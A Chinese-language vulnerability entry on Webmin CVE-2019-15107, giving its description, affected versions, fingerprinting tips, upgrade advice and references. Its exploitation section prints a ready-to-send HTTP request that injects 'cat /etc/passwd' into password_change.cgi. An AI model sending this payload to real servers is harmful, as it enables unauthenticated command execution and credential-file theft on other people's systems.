文章目录
- Webmin_1.910_rce(CVE-2019-15107)
- 漏洞编号
- 漏洞描述
- 影响版本
- 漏洞评级
- 利用方法(利用案例)
- 漏洞挖掘
- 加固建议
- 参考信息
- 漏洞分类
Webmin_1.910_rce(CVE-2019-15107)
漏洞编号
CVE-2019-15107
漏洞描述
Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。
详细的来说,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码,该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码
影响版本
Webmin<=1.920
漏洞评级
严重
利用方法(利用案例)
参考链接:https://vulhub.org/#/environments/webmin/CVE-2019-15107/
payload
payload中的IP改为目标网站的IP,注意user=rootxx这部分,如果写的是user=root,肯定不能成功注入,必须是目标网站的服务器中不存在的用户,否则就会命令执行失败。
发送如下数据包即可执行命令:cat /etc/passwd
POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 73user=rootxx&pam=&expired=2&old=test|cat+/etc/passwd&new1=test2&new2=test2
漏洞挖掘
指纹特征
查找webmin指纹
默认端口
10000是这个系统的默认端口
在目标网站访问这个url:/password_change.cgi
若出现以下界面,说明很可能存在漏洞:
加固建议
升级到1.930版本
参考信息
https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
https://www.exploit-db.com/exploits/47230
https://blog.firosolutions.com/exploits/webmin/
https://vulhub.org/#/environments/webmin/CVE-2019-15107/
https://blog.csdn.net/weixin_43486390/article/details/111591676
漏洞分类
远程命令执行漏洞(RCE)